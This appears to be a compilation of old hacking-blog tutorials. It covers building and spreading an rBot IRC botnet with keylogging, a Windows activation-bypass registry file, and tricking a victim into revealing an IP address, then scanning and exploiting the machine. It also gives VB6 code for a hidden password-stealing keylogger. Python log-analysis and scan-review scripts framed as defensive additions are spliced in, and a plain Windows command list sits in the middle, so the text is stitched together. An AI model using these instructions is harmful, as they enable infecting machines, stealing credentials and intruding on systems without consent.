Botnet

Monday, December 13, 2010

First, let's download all the things you need:

1. Visual Studio 6
2. Visual Studio 6 Service Pack 5
3. Visual Studio 6.0 Processor Pack
4. Windows XP Core SDK
5. IRCPlus 1.5 + Crack (Follow the A, B, C to download)
A... (sign up to sub7)
B... (then click here to get the pass and username for the download)
c... (click here to download)
6. mIRC
7. http://www.no-ip.com account (I'll go into this a bit more later on)
8. Bot Source
 
Second Lets Setup Microsoft Visual C++ 6.0
1. Run Microsoft Visual C++ 6.0 setup.exe and install it
2. Install the Service Pack 6
3. Install Windows XP SDK
4. Open up Microsoft Visual C++ Compiler 6.0
5. Go to Tools > Options and Click the "Directories" tab
6. Browse to these directories and add them to the list: (Click the dotted box to add, make sure they go in this order)
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\LIB

Time To Make a No-Ip Account

This will help stop people getting your IP address.
1. Go to No-IP.com and make an account
2. Set up a free host redirect, e.g. botnet.no-ip.biz
3. Click on downloads to download your No-IP Dynamic DNS Update Client
4. Run and install the file you downloaded, now leave this for now.

Time to install your IRC_plus 1.5
This is where your host will be (where your actual IRC server will be stored). Now you don't need to find/root a box (anyway, let's carry on)
1. Install IRC_plus
2. Use the crack (it will say it never worked, even though it did :S)
3. Now open IRC plus "Remote Control"

Time to setup the mIRC client
The client is so you can connect to your host that you just setup. Without this you would never be able to see the chat room haha.
1. Install mIRC
2. Open mIRC and fill in the usual crap: like name, email, nick blah blah and press ok
3. Now click File> Select Server> Click Add> "fill it out as below"

Description: What ever you want
IRC SERVER: enterwhatyoumade.no-ip.biz (use the No-IP DUC hostname you made)
Ports: 6667 (this is the most commonly used, but it can be 6000-6010; use what's in your bot's config and the one you used on your host)
Group: what ever you want
Password: Password you made in IRCplus

4. Press Add> Press OK
5. Leave mIRC open, open No-IP DUC and Open IRCplus
6. Go back to mIRC and press the lightning bolt in the top left area.

You should now be connected to your server. Now type:

/OPER admin password (Make sure to change password to the one you made on your host)

/join #yourchannel (make sure you replace #yourchannel with the channel you made on your host)

You should now be in your IRC chat room (channel). If you are, you're doing well; if not, start this tutorial again and follow every step to the letter, without skipping ahead at any time.

Now the Bit You Have Been Waiting For: Setting Up Your Bot
1. Unpack "rx-asn-2-re-worked_v3.rar" Bot Source
2. You should see an rx-asn-2-re-worked v3 folder
3. Open the rx-asn-2-re-worked v3
4. Open configs.h and edit these lines only
// bot configuration (generic) - doesn't need to be encrypted
int port = 6667;        // server port (Change to 6667 or the port your IRC uses)

:
#else  // Recommended to use this only for Crypt() setup, this is unsecure.
char botid[] = "Mr Bumbastic";       //Change to what you want the bot to be called
char version[] = "0.1";        // Change What version you want it to be called
char password[] = "password";         // change to a password you will use inside your irc so bots know its you
char server[] = "yournoipduc.no-ip.biz";        // Change to the No-ip DUC address that you made.
char serverpass[] = "paswords";        // Change to the server password you made on the IRCplus host
char channel[] = "#bots";        // Change to the channel you made on the IRCplus host
char chanpass[] = "";        // Best to leave this blank, we don't need it, we have a server password
char server2[] = "";                        // Does not work so make it blank
char channel2[] = "";                        // Does not work so make it blank
char chanpass2[] = "";                        // Does not work so make it blank
char filename[] = "crss";            // What you want your bot to be called in Task Manager (I think, hmmm)
char keylogfile[] = "keylog";                // keylog filename (says it all, haha)
char valuename[] = "Microsoft";        // value name for autostart (not too important, so leave it as Microsoft)
char nickconst[] = "zombie";                    // change to the first part of the bot's nickname in IRC
char szLocalPayloadFile[]=".exe";    // What you want your bot to be called in Task Manager
char modeonconn[] = "-xi+B";                    // Haven't got a clue, so just leave it
char exploitchan[] = "#bots";                        // Channel where exploit messages get redirected
char keylogchan[] = "#bots";                        // Channel where keylog messages get redirected
char psniffchan[] = "#bots";                        // Channel where psniff messages get redirected

5. Save it and close Visual Studio 6
6. Now open the rx-asn-2-re-worked v3 folder again > open rBot.dsw
7. Now right click Rbot file and click build.


8. Your bot will be saved in rx-asn-2-re-worked v3 > Debug folder
9. Send this rBot.exe to people

Lastly Using the bot
Firstly, I am just going to give you very basic commands to use. Make sure you have mIRC, No-IP DUC and IRCplus running and have some bots already.
1. Ok now connect to your server using mIRC
2. Make sure you're the admin (/oper admin password)
3. Use the commands
.Login botpassword
(You have to do this first so the bots listen to you, make sure botpassword is what you set in config.h)

.Remove (in case you opened it on your pc, also removes from other pc's and leaves nothing behind)
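As an added defensive example (not part of this tutorial, and not the bot's code), the script below scans constructed firewall-style connection log lines for the two things the setup above depends on: outbound connections to IRC ports (6667, or the 6000-6010 range the config allows) and a C2 hostname under a free dynamic-DNS provider such as no-ip.biz. The log format, IP addresses, hostnames and the severity rule are all assumptions made for the example; the point is that several internal hosts rendezvousing on one IRC-port destination is the pattern this kind of botnet produces on a network.

```python
import re
from collections import defaultdict

# Constructed sample of firewall-style connection log lines (all IPs, names and times are made up).
SAMPLE_LOG = """\
2010-12-13 10:01:02 ALLOW TCP 192.168.1.20:49152 -> 203.0.113.7:6667 dst=botnet.no-ip.biz
2010-12-13 10:01:03 ALLOW TCP 192.168.1.20:49153 -> 93.184.216.34:443 dst=www.example.com
2010-12-13 10:01:04 ALLOW TCP 192.168.1.31:49300 -> 203.0.113.7:6667 dst=botnet.no-ip.biz
2010-12-13 10:01:05 ALLOW TCP 192.168.1.45:49310 -> 198.51.100.9:6008 dst=198.51.100.9
2010-12-13 10:01:06 ALLOW TCP 192.168.1.20:49154 -> 203.0.113.7:6667 dst=botnet.no-ip.biz
2010-12-13 10:02:06 ALLOW TCP 192.168.1.50:49400 -> 203.0.113.9:80 dst=cdn.example.net
"""

# Port 6667 plus the 6000-6010 range the tutorial says the bot may be configured with.
IRC_PORTS = set(range(6665, 6670)) | set(range(6000, 6011))
# Free dynamic-DNS suffixes used for the C2 hostname in the tutorial.
DYNDNS_SUFFIXES = (".no-ip.biz", ".no-ip.org", ".no-ip.com")

# Assumed log layout: "<date> <time> <action> <proto> <src>:<sport> -> <dst>:<dport> dst=<hostname>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<action>\w+) (?P<proto>\w+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+) dst=(?P<host>\S+)$"
)


def classify_line(line):
    """Return (src, dst, dport, host, reasons) for a suspicious line, or None for a benign one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    dport = int(m["dport"])
    host = m["host"].lower()
    reasons = []
    if dport in IRC_PORTS:
        reasons.append("irc-port")
    if host.endswith(DYNDNS_SUFFIXES):
        reasons.append("dynamic-dns")
    if not reasons:
        return None
    return m["src"], m["dst"], dport, host, tuple(reasons)


def find_irc_c2(log_text):
    """Group suspicious connections by destination and count distinct internal sources.

    Several internal hosts connecting to the same IRC-port destination is the
    pattern a botnet rendezvous produces, so that (or two independent signals)
    raises the severity from medium to high."""
    groups = defaultdict(lambda: {"hosts": set(), "reasons": set(), "hits": 0})
    for line in log_text.splitlines():
        hit = classify_line(line)
        if hit is None:
            continue
        src, dst, dport, host, reasons = hit
        g = groups[(dst, dport, host)]
        g["hosts"].add(src)
        g["reasons"].update(reasons)
        g["hits"] += 1
    report = []
    for (dst, dport, host), g in sorted(groups.items()):
        severity = "high" if len(g["hosts"]) > 1 or len(g["reasons"]) > 1 else "medium"
        report.append({
            "dst": dst, "dport": dport, "host": host,
            "sources": sorted(g["hosts"]), "hits": g["hits"],
            "reasons": sorted(g["reasons"]), "severity": severity,
        })
    return report


if __name__ == "__main__":
    for r in find_irc_c2(SAMPLE_LOG):
        print(f"[{r['severity']}] {r['host']} ({r['dst']}:{r['dport']}) "
              f"hits={r['hits']} sources={r['sources']} reasons={r['reasons']}")
```

Run it and the three connections from two internal hosts to botnet.no-ip.biz:6667 come out as one high-severity group; the single host talking to a bare IP on port 6008 is only medium. In a real deployment the same logic belongs in the SIEM as a rule over egress logs, with the destination hostname joined in from proxy or DNS logs.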

Validate Windows

1) Open Notepad
2) Paste the following code
Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
    "CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
    "ProductId"="55274-640-7450093-23464"
    "DigitalProductId"=hex:a4,00,00,00,03,00,00,00 ,35, 35,32,37,34,2d,36,34,30,2d,\
    37,34,35,30,30,39,33,2d,32,33,34,36,34,00,2e,00,00 ,00,41,32,32,2d,30,30,30,\
    30,31,00,00,00,00,00,00,00,62,fc,61,4c,e0,26,33,16 ,05,d3,54,e7,a0,de,00,00,\
    00,00,00,00,49,36,c2,49,20,47,0c,00,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,33,33,35,30,30,00 ,00,00,00,00,00,00,65,10,\
    00,00,74,99,dd,b0,f7,07,00,00,98,10,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 ,c4,ae,d6,1c
    "LicenseInfo"=hex:e7,77,18,19,f8,08,fc,7d,e8,f 0,df ,12,6e,46,cb,3f,ad,b2,dd,b9,\
    15,18,16,c0,bc,c3,6a,7d,4a,80,8b,31,13,37,5a,78,a2 ,06,c8,6b,b9,d9,dd,cc,6a,\
    9c,c5,9b,77,aa,07,8d,56,6a,7c,e4

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
    "OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33, 93,f d

3) In notepad click File menu then Save.
4) For file type in the save dialog box select "All Files" and for the filename type in ValidateXP.reg or whatever you want. It doesn't matter as long as it has the .reg extension.
5) Click Save.

6) Now, double-click the file.
7) It will ask you "Are you sure...?".
8) Tell it "Hell Yes" and press OK.

You may need to restart your computer

Windows Command

Run Commands

compmgmt.msc - Computer management
devmgmt.msc - Device manager
diskmgmt.msc - Disk management
dfrg.msc - Disk defrag
eventvwr.msc - Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Group policies
lusrmgr.msc - Local users and groups
perfmon.msc - Performance monitor
rsop.msc - Resultant set of policies
secpol.msc - Local security settings
services.msc - Various Services
msconfig - System Configuration Utility
regedit - Registry Editor
msinfo32 - System Information
sysedit - System Edit
win.ini - Windows loading information (also system.ini)
winver - Shows current version of Windows
mailto: - Opens default email client
command - Opens command prompt
 
Run Commands to access the control panel
appwiz.cpl -Add/Remove Programs control
timedate.cpl -Date/Time Properties control
desk.cpl -Display Properties control
findfast.cpl -FindFast control
inetcpl.cpl -Internet Properties control
main.cpl keyboard -Keyboard Properties control
main.cpl -Mouse Properties control
mmsys.cpl -Multimedia Properties control
netcpl.cpl -Network Properties control
password.cpl -Password Properties control
mmsys.cpl sounds -Sound Properties control
sysdm.cpl -System Properties control
 
Command Prompt
ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND Causes MS-DOS to look in other directories when editing a file or running a command.
ARP Displays, adds, and removes arp information from network devices.
ASSIGN Assign a drive letter to an alternate letter.
ASSOC View the file associations.
AT Schedule a time to execute commands or programs.
ATMADM Lists connections and addresses seen by Windows ATM call manager.
ATTRIB Display and change file attributes.
BATCH Recovery console command that executes a series of commands in a file.
BOOTCFG Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK Enable / disable CTRL + C feature.
CACLS View and modify file ACLs.
CALL Calls a batch file from another batch file.
CD Changes directories.
CHCP Supplement the International keyboard and character set information.
CHDIR Changes directories.
CHKDSK Check the hard disk drive running FAT for errors.
CHKNTFS Check the hard disk drive running NTFS for errors.
CHOICE Specify a listing of multiple options within a batch file.
CLS Clears the screen.
CMD Opens the command interpreter.
COLOR Easily change the foreground and background color of the MS-DOS window.
COMP Compares files.
COMPACT Compresses and uncompress files.
CONTROL Open control panel icons from the MS-DOS prompt.
CONVERT Convert FAT to NTFS.
COPY Copy one or more files to an alternate location.
CTTY Change the computers input/output devices.
DATE View or change the systems date.
DEBUG Debug utility to create assembly programs to modify hardware settings.
DEFRAG Re-arrange the hard disk drive to help with loading programs.
DEL Deletes one or more files.
DELETE Recovery console command that deletes a file.
DELTREE Deletes one or more files and/or directories.
DIR List the contents of one or more directory.
DISABLE Recovery console command that disables Windows system services or drivers.
DISKCOMP Compare a disk with another disk.
DISKCOPY Copy the contents of one disk and place them on another disk.
DOSKEY Command to view and execute commands that have been run in the past.
DOSSHELL A GUI to help with early MS-DOS users.
DRIVPARM Enables overwrite of original device drivers.
ECHO Displays messages and enables and disables echo.
EDIT View and edit files.
EDLIN View and edit files.
EMM386 Load extended Memory Manager.
ENABLE Recovery console command to enable a disable service or driver.
ENDLOCAL Stops the localization of the environment changes enabled by the setlocal command.
ERASE Erase files from computer.
EXIT Exit from the command interpreter.
EXPAND Expand a Microsoft Windows file back to its original format.
EXTRACT Extract files from the Microsoft Windows cabinets.
FASTHELP Displays a listing of MS-DOS commands and information about them.
FC Compare files.
FDISK Utility used to create partitions on the hard disk drive.
FIND Search for text within a file.
FINDSTR Searches for a string of text within a file.
FIXBOOT Writes a new boot sector.
FIXMBR Writes a new boot record to a disk drive.
FOR Boolean used in batch files.
FORMAT Command to erase and prepare a disk drive.
FTP Command to connect and operate on a FTP server.
FTYPE Displays or modifies file types used in file extension associations.
GOTO Moves a batch file to a specific label or location.
GRAFTABL Show extended characters in graphics mode.
HELP Display a listing of commands and brief explanation.
IF Allows for batch files to perform conditional processing.
IFSHLP.SYS 32-bit file manager.
IPCONFIG Network command to view network adapter settings and assigned values.
KEYB Change layout of keyboard.
LABEL Change the label of a disk drive.
LH Load a device driver in to high memory.
LISTSVC Recovery console command that displays the services and drivers.
LOADFIX Load a program above the first 64k.
LOADHIGH Load a device driver in to high memory.
LOCK Lock the hard disk drive.
LOGON Recovery console command to list installations and enable administrator login.
MAP Displays the device name of a drive.
MD Command to create a new directory.
MEM Display memory on system.
MKDIR Command to create a new directory.
MODE Modify the port or display settings.
MORE Display one page at a time.
MOVE Move one or more files from one directory to another directory.
MSAV Early Microsoft virus scanner.
MSD Diagnostics utility.
MSCDEX Utility used to load and provide access to the CD-ROM.
NBTSTAT Displays protocol statistics and current TCP/IP connections using NBT
NET Update, fix, or view the network or network settings
NETSH Configure dynamic and static network information from MS-DOS.
NETSTAT Display the TCP/IP network protocol statistics and information.
NLSFUNC Load country specific information.
NSLOOKUP Look up an IP address of a domain or host on a network.
PATH View and modify the computers path location.
PATHPING View and locate locations of network latency.
PAUSE Command used in batch files to stop the processing of a command.
PING Test / send information to another network computer or network device.
POPD Changes to the directory or network path stored by the pushd command.
POWER Conserve power with computer portables.
PRINT Prints data to a printer port.
PROMPT View and change the MS-DOS prompt.
PUSHD Stores a directory or network path in memory so it can be returned to at any time.
QBASIC Open the QBasic.
RD Removes an empty directory.
REN Renames a file or directory.
RENAME Renames a file or directory.
RMDIR Removes an empty directory.
ROUTE View and configure windows network route tables.
RUNAS Enables a user to execute a program on another computer.
SCANDISK Run the scandisk utility.
SCANREG Scan registry and recover registry from errors.
SET Change one variable or string to another.
SETLOCAL Enables local environments to be changed without affecting anything else.
SETVER Change MS-DOS version to trick older MS-DOS programs.
SHARE Installs support for file sharing and locking capabilities.
SHIFT Changes the position of replaceable parameters in a batch program.
SHUTDOWN Shutdown the computer from the MS-DOS prompt.
SMARTDRV Create a disk cache in conventional memory or extended memory.
SORT Sorts the input and displays the output to the screen.
START Start a separate window in Windows from the MS-DOS prompt.
SUBST Substitute a folder on your computer for another drive letter.
SWITCHES Remove add functions from MS-DOS.
SYS Transfer system files to disk drive.
TELNET Telnet to another computer / device from the prompt.
TIME View or modify the system time.
TITLE Change the title of their MS-DOS window.
TRACERT Visually view a network packets route across a network.
TREE View a visual tree of the hard disk drive.
TYPE Display the contents of a file.
UNDELETE Undelete a file that has been deleted.
UNFORMAT Unformat a hard disk drive.
UNLOCK Unlock a disk drive.
VER Display the version information.
VERIFY Enables or disables the feature to determine if files have been written properly.
VOL Displays the volume information about the designated drive.
XCOPY Copy multiple files, directories, and/or drives from one location to another.
TRUENAME When placed before a file, will display the whole directory in which it exists
TASKKILL It allows you to kill those unneeded or locked up applications

Ip Address Hack

Sunday, December 6, 2009

Now I have seen people ask this question over and over and over. So I thought of making a detailed tutorial on this, which might help "some" people.


Intro:

This tutorial does require certain basics, so I suggest beginners should read about ports and other things (although I have explained it here, it might be intermediate level).
Now basically you cannot just do anything you want with the IP address. You can, but you need the right things, some mind and also luck.

Anyways lets begin shall we.



Getting an Ipaddress:

Ok, there are lots of ways of getting an IP address. For example, you can use the ipget plugin of msnplus and send him a picture or a smiley that he doesn't have. Or you can do this the easy and effective way:

http://www.reza24.com/ip/
Now this site basically has some scripts installed, and when you register with them they give you a referral link like reza24.com/id=1180 or something. All you have to do is give it to your victim and say "Hey, can you check if this site is opening? It's not opening for me."

He clicks and you get his IP EMAILED to you, instantly.


Also keep in mind that not all IP addresses are static. Some ISPs provide dynamic addresses, so it's a matter of time before the user turns off his net and the IP changes. So try to hack him as soon as you get his IP.

That sums up the part about getting the victim's IP. Let's move on to hax0ring.



Port Scanning:

First thing you do is try to ping the IP. If the victim is online you will get a reply, else "request timed out".

In my case, yep, he is online. Let's scan for open ports now.

1) I use Blues Port Scanner, which you can download from: http://depositfiles.com/files/i1psjerg3

The result now:

Interesting ports on *ipaddress*:
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
111/tcp open sunrpc
135/tcp open loc-srv
443/tcp open https
1027/tcp open IIS
1030/tcp open iad1
2306/tcp open unknown
5631/tcp open pcanywheredata
7937/tcp open unknown
7938/tcp open unknown
36890/tcp open unknown



Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (i.e. 80-HTTP, 25-SMTP, etc.). Simply take all that information and paste it into Notepad or the editor of your choice. But there is one problem; we all know it's not that easy: we don't even know what type of software or what operating system this system is running.


2) NMAP - Port scanner. Has unique OS fingerprinting methods, so when the program sees a certain series of ports open it uses its best judgement to guess what operating system it's running. Generally correct.

So we have to figure out what type of software this box is running. Many of you have used TELNET; for those who haven't, TELNET is used to open a remote connection to an IP address through a port.

Download:
www.nmap.org

Translation:
we are accessing their computer from across the internet; all we need is their IP address and a port number. With that record you are starting to compile, open a TELNET connection to the IP address and enter one of the OPEN ports that you found on the target.

So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25'. This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me? Well, get that list you are starting to write, and copy the banners into your compilation of the information you've gathered on your target. Banners/headers are what you get when you TELNET to the open ports. Here's an example of a banner from port 25.


220 7thsage.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400

Now this is a very important part in the enumeration process. You notice it says 'Sendmail 8.12.8/8.12.8'. Well, what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. There are some instances in which companies will try and falsify their headers/banners so hackers are unable to find out what programs are truly installed. Some ports may not have banners.

Other points of interest may be the DNS server, which contains lots of information, and if you are able to manipulate it then you can pretend to be hotmail and steal a bunch of people's email. Well, now back to the task at hand. Apart from actual company secrets and secret configurations of the network hardware, you got some good info.
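Reading the scan listing and the port-25 banner from the other side: the added Python below (not from this tutorial) parses a constructed copy of the scan output above into rows, flags the open services that a perimeter policy would not normally allow to be internet-facing, and pulls the product and version out of a Sendmail-style 220 greeting. The policy table, the scan address, the mail host and the date in the banner are assumptions; what the banner check shows is that a greeting which advertises "Sendmail 8.12.8" hands the version number straight to whoever connects, which is why hardening guides recommend a minimal greeting.

```python
import re

# Constructed scan listing in the same layout as the tutorial's output (address made up).
SCAN_OUTPUT = """\
Interesting ports on 198.51.100.23:
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
111/tcp open sunrpc
135/tcp open loc-srv
443/tcp open https
1027/tcp open IIS
5631/tcp open pcanywheredata
36890/tcp open unknown
"""

# Constructed port-25 greeting in the shape of the tutorial's banner; host and date are made up.
SMTP_BANNER = "220 mail.example.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400"

# Assumed perimeter policy: services that have no business being reachable from the internet.
NOT_FOR_INTERNET = {
    "sunrpc": "RPC portmapper; keep internal",
    "loc-srv": "MS RPC endpoint mapper; block at the perimeter",
    "pcanywheredata": "remote-control service; reach it over VPN only",
    "unknown": "unidentified listener; find the owner or close it",
}

PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\w+)\s+(?P<service>\S+)$")
BANNER_RE = re.compile(r"^220\s+(?P<host>\S+)\s+ESMTP\s+(?P<product>\w+)\s+(?P<version>[\w.]+)")


def parse_scan(text):
    """Turn the listing into (port, proto, state, service) rows, skipping the header lines."""
    rows = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            rows.append((int(m["port"]), m["proto"], m["state"], m["service"].lower()))
    return rows


def review_exposure(rows):
    """Open ports whose service is on the not-for-internet list, with the policy reason."""
    return [(port, service, NOT_FOR_INTERNET[service])
            for port, _proto, state, service in rows
            if state == "open" and service in NOT_FOR_INTERNET]


def parse_smtp_banner(banner):
    """Pull host, product and version out of a 220 greeting; None if nothing is advertised."""
    m = BANNER_RE.match(banner)
    if not m:
        return None
    return {"host": m["host"], "product": m["product"], "version": m["version"]}


def banner_leaks_version(banner):
    """True when the greeting advertises a product version (the detail the tutorial keys on)."""
    parsed = parse_smtp_banner(banner)
    return parsed is not None and any(ch.isdigit() for ch in parsed["version"])


if __name__ == "__main__":
    for port, service, why in review_exposure(parse_scan(SCAN_OUTPUT)):
        print(f"{port}/tcp {service}: {why}")
    print(parse_smtp_banner(SMTP_BANNER), "leaks version:", banner_leaks_version(SMTP_BANNER))
```

On the sample listing the review flags 111, 135, 5631 and 36890; the web and mail ports are left for a separate review of what is behind them. The same parser can be pointed at a scheduled external scan of your own address space so that a newly exposed listener shows up as a diff rather than as somebody else's banner collection.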

http://www.securityfocus.com is a very good resource for looking up software vulnerabilities. If you can't find any vulnerabilities there, search on Google. There are many, many, many other sites that post vulnerabilities that their groups and their affiliates find. http://www.milw0rm.com is also very popular, but it's generally down for me, fools DDoSing it.

At SecurityFocus you can search through vendor and whatnot to try and find your piece of software, or you can use the search box. I looked it up and I found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof-of-concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. That pound symbol means that the command prompt window that's currently open was opened as root, the highest privilege on a UNIX/Linux box. You have just successfully hacked a box. So now you have a cmd shell in front of you; start doing whatever you want.

HOWEVER, it's not recommended; just leave a text file saying how you did it so they can patch it. For blackhats such as me, you can just keep it a secret. This will avoid visits from unwanted authorities :P


There are many types of exploits out there. Some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someone's box to everyone trying to access it. Buffer overflow exploits are involved when a variable inside some code doesn't have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now, where the variables are located when they are in use by a program is called the buffer. Now what do you think overflowing the buffer means? We overflow the buffer so we can get to a totally different memory address. Then people write what's called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit. That wasn't the best description of a buffer overflow; however, all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the victim will enter http://www.bank.com and his connection will be redirected to your site, where you can make a username and password box and make the site look legit. And your poor mark will enter their credentials into your site, when they think it's really http://www.bank.com. You need to have a small script set up so it will automatically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the victim doesn't give it a second thought and will simply try again later.


____________________________________________________________________________


Summary:


So as a summary of how to 0wn a box when you only have an IP address.
The method works on BOTH Unix and Windows. You can do the same with domain names (i.e. google.com) as you can with IP addresses: run a WHOIS lookup or something along those lines, or check up on InterNIC; you should be able to resolve the domain name to an IP address.

- Port Scan The Address And Record Open Ports.
- Telnet To Open Ports To Identify Software Running On Ports.


3) NetCat:

Like TELNET only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports.

- Record Banners And Take Note Of The Application Running and The Version Number
- Take A Gander Online At SecurityFocus.com or Eeye.com. If you can't find any vulnerabilities then search Google.
- Make a copy of some Proof-Of-Concept code for the vulnerability.

*Read the documentation, if there is any, for the proof-of-concept code you will be using for your exploit*

- Run The Exploit Against The Victim.
- Reap The Cheap-Shot Ownage.


______________________________________________________________________________

WARNING:

This tutorial does not cover clearing your tracks. If you dare try any of this stuff on a box you don't have consent to hack on, they will simply look at the logs and see your IP address and then go straight to your ISP. So I suggest you learn how to anonymize yourself; there are lotta tuts here on HF.

Always remember: the more info on the system you have, the more are your chances to exploit it.

 

Complete Keylogging

When you are done with this tutorial you will be able to Make and Use a keylogger that is close to fully undetectable,
without the victim getting suspicious. You will be able to keylog just about anyone.

This Guide will be split into 2 parts:
Writing your own undetectable keylogger
- The language
- Logging and storing
- Uploading logs
Setting it up to be un-suspicious and trustworthy
- Binding with other files
- Making sure its existence is hidden

Before we begin i want to point out that this keylogger is NOT perfect.
It will be unable to record some symbols
It will occasionally rearrange a letter with one another if the user types fast
But the passwords should easily get through.

Writing the Keylogger.

In this guide we will be using Microsoft Visual Basic 6.0 (vb6 for short)
If you do not know/have this, dont leave just yet.
Reading this guide its not "Necessary" to have vb6 knowledge (highly recommended tho)
Find VB6 through  the net

Open up VB6 and choose standard EXE.

Put on your form:
3 timers
1 label

double-click your form (design) and you see the source of our keylogger, almost empty at this point.


Go back to the design and set properties for the form
Set the form name to a few random letters (title doesnt matter)
Set Visible = false
Set ShowInTaskbar = false
This should make it invisible from the user.


go back to the source and write the following in the "Form_Load" sub

If app.previnstance = true then end
app.taskvisible = false

This means that if it's already running and is opened again, it will not start another keylogger (two keyloggers running would cause errors), and it will not show in the Task Manager's program list (but still in the process list)

Now lets go to the General Section of our source and declare some API functions in order to start writing. General section can be found by using (General) in the top left scrollbar

There are 2 effective methods to keylog with VB6
- Keyhooks
- GetAsyncKeyState

We will be using GetAsyncKeyState, which checks if a key is being pressed when executed
But before we can start using GetAsyncKeyState we must declare it in the general section

GetAsyncKeyState Declaration:
 Private Declare Function GetAsyncKeyState Lib "user32" (byval vkey as long) as integer
^ tells what Lib we need for GetAsyncKeyState.

With this code placed we can start using GetAsyncKeyState commands.

To find out what key is pressed we need to use getasynckeystate as so:
If GetAsyncKeyState(number) <> 0 then
'code to execute if key is pressed
end if
Now you might be wondering what the "number" means, actually, the number we type here is a keyboard key,
you see, every key has a number (KeyCode), from around 1 to 200. (1 and 2 being mouse buttons)
KeyCodes Value
http://msdn.microsoft.com/en-us/library/aa243025%28VS.60%29.aspx
 
That's a lot of keycodes. Now, there's an easy way of checking all of the keys at the same time. But it appears that doing it causes a lot of weird symbols and capital letters only.
But i want it done properly so im gonna check One key at a time. You can decide yourself what you want to do.
I will show you the easy method too later on tho.

Now that we know how to check for a keypress, we want it to write it down somewhere temporary. There are many ways to do so; I will be using a label. You can use a String as well.
Set the caption of the label to nothing. Now a full example of the letter "a" would be this:
if GetAsyncKeyState(65) <> 0 then
label1.caption = label1.caption + "a"
end if
So that if "a" key is pressed an "a" is added to our label.

Code 65-90 is a-z

To check if a key is pressed more than one time we put the code in a timer. I find that it works best when the interval is set to around 125.
Which means that the code is executed 8 times a second. (125 milliseconds). You must change the interval from 0 to 50-150, else it will not work. you can change the interval in the properties of the timer
If you have less interval, it might double record the keystroke, if you have more, it might miss it.
To start writing to a timer either choose "timer1" in the scrollbar in the top-left corner of the source page, or double-click the timer icon on the form design
Do this again and again with all keys from a-z, and numbers 0-9 (also in numpad)

Now it records letters and numbers, not bad, but we are far from done yet.
if we finished up now our logs would be one big pile of letters, pretty much unreadable.
so what we need to do is add spaces, and a hell of a lot of them. The user browses around a lot, clicking here and there, so if we add spaces on keys like mouse buttons, space, enter, ctrl etc. we would get something readable with a lot of spaces.
So find Keycodes for those keys and add a space to the label if pressed. Most important is the mouse clicks.

now, were not done just yet. We want to check if a letter is Capital. we do that by checking if shift or caps-lock has been pressed before every key. And if it has, make it print a capital letter instead.

Now to do this, we want to use booleans (true / false), so goto the general section and write this:
dim caps as boolean
The keycode for capsLock is 20. We want to write capslock like this in the timer.
 
 if GetAsyncKeyState(20) <> 0 then
if caps = true then
label1.caption = label1.caption + "(/caps)"
caps = false
goto a
end if
label1.caption = label1.caption + "(caps)"
caps = true
end if
a:
 
The above code may seem a little confusing, but its simple really. when CapsLock is pressed it writes (caps) into the label. and sets our boolean "caps" to "True".
The next time capsLock is pressed (to disable it) instead of writing (caps) it writes (/caps). and Sets "caps" to "False". That way you will know that the letters between (caps) and (/caps) is all capital. Nice!
Every time Caps Lock is pressed, it will add (caps) or (/caps) according to the state of the caps boolean.

Its a little different with shift. Shift has the keycode 16 btw.
dim "shift" as boolean in the general section. just like before.
If GetasyncKeyState(16) <> 0 then
shift = true
end if

So if Shift is pressed the "shift" boolean becomes true. now in all codes checking for letters add this:
example with "a" key:
 
 
if GetAsyncKeyState(65) <> 0 then
if shift = true then
label1.caption = label1.caption + "A"
shift = false
goto b
end if
label1.caption = label1.caption + "a"
end if
b:
 
 (remember to use a different letter(s) in the goto commands every time)

So if Shift has been pressed, the next key being pressed will be capital. Nice!
NOTE: You can do this with numbers too to get their symbol instead.

You should now have in your timer: checks for a-z (all with the Shift check), a lot of keys making spaces, the Caps Lock check, and 0-9.
